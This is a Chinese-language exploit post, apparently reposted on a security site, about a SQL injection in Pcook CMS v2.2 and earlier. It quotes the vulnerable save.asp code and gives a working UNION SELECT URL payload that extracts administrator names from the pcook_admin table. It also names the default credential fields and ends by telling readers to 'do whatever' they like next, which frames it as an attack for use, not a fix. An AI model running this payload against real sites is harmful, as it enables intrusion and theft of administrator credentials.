Pcook CMS v2.2 以及以下版本的注入漏洞

admin 2021年4月3日18:52:41评论24 views字数 1236阅读4分7秒阅读模式

    漏洞标题:Pcook CMS 文章管理系统 v2.2 以及以下版本的注入漏洞

    影响程序:Pcook CMS 文章管理系统 v2.2 以及以下版本

    下载地址:http://down.chinaz.com/soft/23761.htm

    漏洞文件:save.asp,hits.asp

save.asp 代码:

Dim id
Dim Rs,Sql
id = Replace(Trim(Request.QueryString("id")),"'","")
If Session("id"&id)"" Then
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
  Response.Write("NoData")
Else
  Response.Write("Dig")
  Response.Write(",")
  Response.Write(Rs("Dig"))
End If
Else
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
  Response.Write("NoData")
Else
  Dim Dig
  Dig =Rs("Dig")
  Dig = Dig + 1
  Rs("Dig") = Dig
  Rs.Update
  Rs.Close
  Set Rs = Nothing
  Session("id"&id) = id
  Response.Write(Dig)
End If
End If
%>

    过滤不全,直接可以利用。

    随便找篇文章,链接如:list.asp?id=1341,把 list.asp 改为 save.asp 就可以了,如下:

        save.asp?id=1341%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin_name,16,17,18,19,20,21%20from%20pcook_admin

    有的也许是19个字段,刚刚就有遇到过。

    默认表名:pcook_admin

    默认字段表:admin_name,admin_pass

    然后该干嘛干嘛去……

文章来源于lcx.cc:Pcook CMS v2.2 以及以下版本的注入漏洞

相关推荐: 【Exp】mail sohu xss 搜狐邮箱跨站

mail sohu xss 搜狐邮箱跨站 转自:T00LS - 低调求发展 影响:IE6,IE7,IE8 代码: 截图: 下载 (72.58 KB) 2 小时前 文章来源于lcx.cc:【Exp】mail sohu xss 搜狐邮箱跨站相关推荐: 【价值】我不…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:52:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Pcook CMS v2.2 以及以下版本的注入漏洞https://cn-sec.com/archives/319001.html

发表评论

匿名网友 填写信息